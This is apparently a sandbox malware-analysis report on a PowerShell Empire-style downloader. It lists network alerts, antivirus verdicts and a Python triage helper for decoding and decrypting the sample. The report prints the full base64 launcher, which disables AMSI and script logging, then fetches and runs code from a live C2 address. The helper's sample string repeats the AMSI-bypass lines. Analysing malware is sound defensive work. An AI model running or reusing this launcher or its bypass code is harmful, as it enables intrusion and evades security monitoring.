Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 4, 2024, 5:05 p.m. | July 4, 2024, 5:08 p.m. |
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc … (base64 argument elided here; it is shown in full in the cmdline rows below)
2184
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49169 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49170 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49171 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49172 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 117.18.232.200:443 -> 192.168.56.102:49173 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 117.18.232.200:443 -> 192.168.56.102:49174 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc … (same base64 argument as the next cmdline row) |
cmdline | powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA== |
host | 117.18.232.200 |
host | 89.197.154.116 |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA== |
parent_process | wscript.exe | martian_process | powershell -noP -sta -w 1 -enc … (same base64 argument as the previous martian_process row) |
option | -nop | value | -NoProfile: the PowerShell profile scripts are not loaded |
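Added triage helper (example code, not part of the sandbox report or of any tool it names). The switches on the flagged command line are -noP (-NoProfile), -sta (single-threaded apartment, which the script needs for the InternetExplorer.Application COM object it drives), -w 1 (-WindowStyle Hidden) and -enc (-EncodedCommand, base64 of the script in UTF-16LE). Decoding the argument above gives a PowerShell Empire-style launcher: it sets amsiInitFailed and rewrites cachedGroupPolicySettings to switch off AMSI and script-block logging, keeps the C2 URL http://89.197.154.116:7810 (the host and port listed under dead_host) as a nested UTF-16LE base64 string, fetches /login/process.php through a hidden IE COM object, and treats the response as base64 whose first four bytes are an IV prepended to a 32-byte ASCII staging key for an RC4 routine ($R) before piping the result to IEX. The helper below decodes an -enc argument, strips the 'a'+'b' string splitting, lists those markers, unwraps the nested base64 and re-implements the RC4 step so a stage-2 body pulled from a pcap can be decrypted offline. The embedded sample launcher is constructed for this example (only the inner URL base64 is the literal one from the report's argument) and its staging key is made up; the hostile value comes from running triage() on the real cmdline argument.

```python
"""Triage helper for a 'powershell -noP -sta -w 1 -enc ...' Empire-style launcher.

Added example, not part of the sandbox report.  Decodes the -EncodedCommand
argument, strips cheap string-splitting obfuscation, lists AMSI/logging-bypass
markers, unwraps nested base64 (the C2 URL) and reimplements the launcher's RC4
routine so a captured stage-2 response can be decrypted offline.
"""
import base64
import re

# CONSTRUCTED sample launcher: a short fragment with the same markers as the real
# argument (AMSI bypass, staging key, base64-wrapped C2 URL, RC4 call into IEX).
# Only the inner base64 string is the literal one from the report; it decodes to the
# host:port also listed under dead_host.  The staging key is made up.
SAMPLE_PS = (
    "If($PSVersionTable.PSVersion.Major -ge 3){"
    "$Ref=[Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils');"
    "$Ref.GetField('amsiInitF'+'ailed','NonPublic,Static').SetValue($null,$true)};"
    "$e2b=[System.Text.Encoding]::ASCII.GetBytes('CONSTRUCTED-STAGING-KEY-32BYTES!');"
    "$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("
    "'aAB0AHQAcAA6AC8ALwA4ADkALgAxADkANwAuADEANQA0AC4AMQAxADYAOgA3ADgAMQAwAA==')));"
    "$t='/login/process.php';"
    "-join[Char[]](& $R $data ($IV+$e2b)) | IEX"
)
# What the sandbox would see after -enc: base64 of the UTF-16LE script.
ENC_ARG = base64.b64encode(SAMPLE_PS.encode("utf-16le")).decode("ascii")

MARKERS = {  # canonical name -> regex searched in the normalised, lower-cased script
    "amsiInitFailed": r"amsiinitfailed",
    "cachedGroupPolicySettings": r"cachedgrouppolicysettings",
    "EnableScriptBlockLogging": r"enablescriptblocklogging",
    "InternetExplorer.Application": r"internetexplorer\.application",
    "IEX": r"\b(iex|invoke-expression)\b",
}


def decode_enc(arg: str) -> str:
    """Reverse -EncodedCommand: base64 -> UTF-16LE text."""
    return base64.b64decode(arg).decode("utf-16le")


def normalise(ps: str) -> str:
    """Undo 'a'+'b' string splitting and backtick escapes so markers match."""
    return re.sub(r"'\s*\+\s*'", "", ps.replace("`", ""))


def unwrap_base64_strings(ps: str) -> list[str]:
    """Decode each literal FromBase64String('...') as UTF-16LE ([Text.Encoding]::Unicode)."""
    blobs = re.findall(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", ps, re.I)
    return [base64.b64decode(b).decode("utf-16le", errors="replace") for b in blobs]


def triage(enc_arg: str) -> dict:
    """Markers present, nested base64 strings (C2 URL) and the ASCII staging key."""
    ps = normalise(decode_enc(enc_arg))
    low = ps.lower()
    key = re.search(r"ASCII\.GetBytes\('([^']+)'\)", ps, re.I)
    return {
        "indicators": [name for name, pat in MARKERS.items() if re.search(pat, low)],
        "c2": unwrap_base64_strings(ps),
        "staging_key": key.group(1).encode("ascii") if key else None,
    }


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4, byte for byte what the launcher's $R scriptblock computes."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for b in data:  # keystream generation and XOR
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def decrypt_stage(response_b64: str, staging_key: bytes) -> str:
    """Stage-2 body as the launcher handles it: base64 -> 4-byte IV, RC4(IV||key, rest)."""
    raw = base64.b64decode(response_b64)
    iv, body = raw[:4], raw[4:]
    return rc4(iv + staging_key, body).decode("latin-1")  # [Char[]] maps bytes 1:1 to chars


def encrypt_stage(iv: bytes, staging_key: bytes, script: bytes) -> str:
    """Inverse of decrypt_stage; only needed to build offline test material (RC4 is symmetric)."""
    return base64.b64encode(iv + rc4(iv + staging_key, script)).decode("ascii")


if __name__ == "__main__":
    print(triage(ENC_ARG))
```

Point triage() at the -enc value from the cmdline row above to recover the real staging key and C2 URL, and decrypt_stage() at the base64 body the server returns for /login/process.php (from the pcap) to read stage 2; the JA3/Tofsee alerts above are on 117.18.232.200, not on the C2 host the launcher actually contacts.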
Engine | Result |
---|---|
Cynet | Malicious (score: 99) |
CAT-QuickHeal | Script.Trojan.39876 |
Skyhigh | PS/Dropper.f |
ALYac | GT:VB.ObfDldr.28.29C080A2 |
VIPRE | GT:VB.ObfDldr.28.29C080A2 |
Sangfor | Malware.Generic-VBS.Save.f99adb70 |
Arcabit | GT:VB.ObfDldr.28.29C080A2 |
Symantec | Trojan.Malscript!gen8 |
ESET-NOD32 | PowerShell/TrojanDownloader.Agent.ABM |
McAfee | PS/Dropper.f |
Avast | VBS:Downloader-AXD [Trj] |
Kaspersky | HEUR:Trojan.PowerShell.Generic |
BitDefender | GT:VB.ObfDldr.28.29C080A2 |
NANO-Antivirus | Trojan.Script.Downloader.inbiqr |
MicroWorld-eScan | GT:VB.ObfDldr.28.29C080A2 |
Emsisoft | GT:VB.ObfDldr.28.29C080A2 (B) |
F-Secure | Malware.VBS/PSRunner.VPSV |
FireEye | GT:VB.ObfDldr.28.29C080A2 |
Sophos | ATK/Empire-U |
 | Detected |
Avira | VBS/PSRunner.VPSV |
Xcitium | TrojWare.Win32.BadShell.XSN@7pmib7 |
Microsoft | Trojan:PowerShell/Fleisnam.E |
ZoneAlarm | HEUR:Trojan.PowerShell.Generic |
GData | GT:VB.ObfDldr.28.29C080A2 |
AhnLab-V3 | Powershell/Downloader.S5 |
Tencent | Heur:Trojan.Powershell.Generic.u |
MAX | malware (ai score=88) |
Fortinet | PowerShell/Agent.AN!tr |
AVG | VBS:Downloader-AXD [Trj] |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
dead_host | 192.168.56.102:49164 |
dead_host | 192.168.56.102:49165 |
dead_host | 192.168.56.102:49163 |
dead_host | 89.197.154.116:7810 |